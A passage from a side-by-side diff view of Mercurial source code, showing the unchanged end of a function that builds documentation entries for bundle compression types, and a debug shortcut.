3748 continue
3760 continue
3749
3761
3750 bt = engine.bundletype()
3762 bt = engine.bundletype()
3751 if not bt or not bt[0]:
3763 if not bt or not bt[0]:
3752 continue
3764 continue
3753
3765
3754 doc = pycompat.sysstr('``%s``\n %s') % (
3766 doc = pycompat.sysstr('``%s``\n %s') % (
3755 bt[0], engine.bundletype.__doc__)
3767 bt[0], engine.bundletype.__doc__)
3756
3768
3757 value = docobject()
3769 value = docobject()
3758 value.__doc__ = doc
3770 value.__doc__ = doc
3759 value._origdoc = engine.bundletype.__doc__
3771 value._origdoc = engine.bundletype.__doc__
3760 value._origfunc = engine.bundletype
3772 value._origfunc = engine.bundletype
3761
3773
3762 items[bt[0]] = value
3774 items[bt[0]] = value
3763
3775
3764 return items
3776 return items
3765
3777
3766 i18nfunctions = bundlecompressiontopics().values()
3778 i18nfunctions = bundlecompressiontopics().values()
3767
3779
3768 # convenient shortcut
3780 # convenient shortcut
3769 dst = debugstacktrace
3781 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now